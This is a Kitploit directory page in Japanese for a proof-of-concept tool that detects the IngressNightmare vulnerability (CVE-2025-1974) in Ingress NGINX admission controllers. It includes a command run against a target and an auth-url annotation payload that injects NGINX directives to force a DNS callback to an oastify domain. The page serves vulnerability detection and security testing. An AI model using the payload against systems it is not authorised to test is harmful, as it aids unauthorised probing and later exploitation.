Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ingressnightmare-detection-poc — IngressNightmare(CVE-2025-1974)を(非侵入的な)能動的手段で検出するための概念実証ツール | Kitploit
ツール/GitHubGitHub/m-q-t/ingressnightmare-detection-poc
脆弱性スキャナーエクスプロイトウェブセキュリティペネトレーションテストクラウドセキュリティ設定ミス
GitHubm-q-t/ingressnightmare-detection-poc

ingressnightmare-detection-poc

IngressNightmare(CVE-2025-1974)を(非侵入的な)能動的手段で検出するための概念実証ツール

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

IngressNightmare 検出ツール

概要

このツールは、Ingress NGINX Controller に影響を及ぼす IngressNightmare 脆弱性チェーン(CVE-2025-1974)の検出機能を非侵襲的に提供します。具体的には、auth-url アノテーションインジェクションベクター(CVE-2025-24514)を利用して、任意のコードを実行することなくこの重大な脆弱性の存在を確認します。

技術的背景

IngressNightmare の脆弱性チェーンにより、攻撃者はさまざまな Ingress アノテーションフィールドを通じて任意の NGINX 設定ディレクティブを注入できます。これらの悪意のある Ingress リソースがアドミッションコントローラーによって処理されると、注入されたディレクティブは NGINX 設定検証フェーズ(nginx -t)中に評価されます。

この PoC は、攻撃者が制御するドメインを指す syslog サーバーを指定した error_log ディレクティブを注入することで、特に auth-url アノテーションの脆弱性を悪用します。設定検証中に、NGINX は以下の動作を行います。

  1. 注入された設定を解析する
  2. 指定されたドメインを DNS で解決する

この DNS 解決アクティビティは、コード実行やサービス中断を必要とせずに、ターゲットが脆弱であることを示す信頼性の高いシグナルとなります。

使用法

  1. Burp Collaborator、interactsh、または任意の DNS 監視サービスを使用して DNS コールバックリスナーをセットアップします。

  2. 検出ツールを実行します:

    root@kitploit:~
    $ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com 
    
  • 脆弱な場合、DNS コールバックドメインへの DNS 解決試行が確認できます:

  • poc

    検出方法

    このツールは、以下のインジェクションペイロードを含む Ingress リソースを備えた、特別に構成された AdmissionReview オブジェクトを作成します:

    root@kitploit:~
    nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"
    

    このペイロードは:

    • コメント文字(#)を使用して URL を終了させる
    • 改行とそれに続く resolver ディレクティブを注入する
    • DNS コールバックドメインを指す syslog を指定した error_log ディレクティブを追加する
    • 構文的な妥当性を維持するために残りをコメントアウトする

    脆弱なアドミッションコントローラーによって処理されると、これにより外向きの DNS ルックアップが発生し、脆弱性の存在が確認されます。

    制限事項

    このツールは脆弱性の存在を検出するのみであり、任意のコード実行を目的とした悪用は試みません。

    クレジット

    https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities

    ツールをダウンロード